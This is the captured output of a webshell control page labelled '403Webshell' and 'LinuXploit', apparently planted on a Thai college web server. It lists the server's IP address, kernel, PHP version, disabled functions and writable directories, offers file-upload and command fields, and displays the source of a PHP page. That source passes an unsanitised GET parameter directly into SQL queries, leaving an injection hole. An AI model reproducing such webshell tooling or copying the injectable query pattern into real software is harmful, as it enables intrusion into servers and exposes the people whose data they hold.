403Webshell
Server IP : 202.29.229.35  /  Your IP : 3.15.237.35
Web Server : Apache
System : Linux aapanel2 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User : www ( 1001)
PHP Version : 5.5.38
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/www.ivecr2.ac.th/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/www.ivecr2.ac.th/stdjob_detail.php
 <div class="box">
  	<div style="width: 100%;">
  	  <table width="100%" border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td><div class="fdefault fbold txt-topic display-inline-block" style="width: 300px;" >นศ.หางาน</div></td>
        <td align="right" valign="top"><div class="fgray" style="line-height: 20px;"><a href="?i=tab_stdjob"  class="link-orange">ย้อนกลับ...</a></div></td>
      </tr>
    </table>
    <div class="line-bottom-red display-inline-block" style="width: 700px;" ></div>
    <div class="link-default-org" style="margin-bottom: 5px; padding:5px">
    

<table width="100%" border="0" cellspacing="5" cellpadding="0">
  <tr>
    <td align="left" valign="top">
      <?php
	 	 include("connect/connect.php");
		//include("connect/function.php");
		$jobID=$_GET['jobID'];
        $sqlSC="select * from tbl_stdjob where sc_ID='$jobID' ";
        $resultSC=mysql_query($sqlSC,$connect1);
        $numSC=mysql_num_rows($resultSC);
      	$rsSC=mysql_fetch_array($resultSC);
        $dateSC=displaydate($rsSC['sc_Date']);
		
						$dp_ID=$rsSC['dp_ID'];
						
					$queryperlogin = "select * from tbl_datatecher1 where tecNumber='$dp_ID' ";
					//echo "=>".$queryperlogin."<br>";
					$resultperlogin=mysql_query($queryperlogin,$connect2);
					$rsperteclogin=mysql_fetch_array($resultperlogin);
					$selectworklogin = $rsperteclogin['selectwork'];//กลุ่มงาน
					//echo "==>".$selectworklogin;
					//ชื่อกลุ่มงาน
						$sqlworklogin="select * from tbl_departmentall where daNodpt='$selectworklogin' ";
						$resqlworklogin=mysql_query($sqlworklogin,$connect1);
						$rsworklogin=mysql_fetch_array($resqlworklogin);
						$workname = $rsworklogin['daFname'];
							
		echo $rsSC['sc_Title']."<p>";
		echo $rsSC['sc_Detail'];
		
      ?>
      <font color="#0099FF" size="-2"><i>ข้อมูลโดย : <?php echo $workname. " เมื่อ :".$dateSC;?></i></font>
      <?php if($rsSC['sc_file'] !=""){ ?><a href="system_admin/file_stdjob/<?php echo $rsSC['sc_file'];?>" target="_blank" class="link-default-org">&nbsp; <font color="#FF0000">
        >> อ่านต่อ...</font></a><?php } ?></td>
  </tr>
</table>
    </div>
  </div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit